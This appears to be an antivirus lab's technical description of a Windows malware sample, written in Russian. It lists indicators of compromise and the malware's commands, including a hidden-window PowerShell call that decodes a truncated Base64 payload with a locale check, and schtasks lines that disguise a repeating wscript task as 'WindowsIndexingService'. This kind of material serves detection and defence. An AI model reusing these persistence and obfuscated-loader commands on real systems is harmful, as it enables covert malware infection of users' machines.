Техническая информация
- <SYSTEM32>\tasks\windowsindexingservice
- %APPDATA%\microsoft\windows\start menu\programs\startup\windowsindexingservice.lnk
- C:\users\public\libraries\thumbcache_33.db
- C:\users\public\libraries\thumbcache_33.db
- DNS ASK ho##.##tdietfitness.com
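- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...
  (Примечание: видимое начало Base64-строки декодируется как `if(((Get-UICulture).Name -match "CN|RO|RU|UA|BY") -or ((Get-WmiObject -class ` — то есть скрипт начинается с проверки языка интерфейса системы. Остальная часть строки в отчёте обрезана, поэтому дальнейшая логика по этой записи не восстанавливается.)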
- '<SYSTEM32>\schtasks.exe' /delete /TN WindowsIndexingService /f
- '<SYSTEM32>\schtasks.exe' /delete /TN "Windows Indexing Service" /f
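- '<SYSTEM32>\schtasks.exe' /create /TN WindowsIndexingService /sc DAILY /st 00:00 /f /RI 16 /du 23:59 /TR "wscript.exe //nologo "C:\Users\Public\Libraries\WindowsIndexingService.js" >NUL 2>&1"
  (Примечание: задача WindowsIndexingService создаётся с ежедневным запуском в 00:00 и повторением каждые 16 минут в течение 23 ч 59 мин; при каждом срабатывании wscript.exe выполняет скрипт WindowsIndexingService.js из C:\Users\Public\Libraries, а вывод перенаправляется в NUL.)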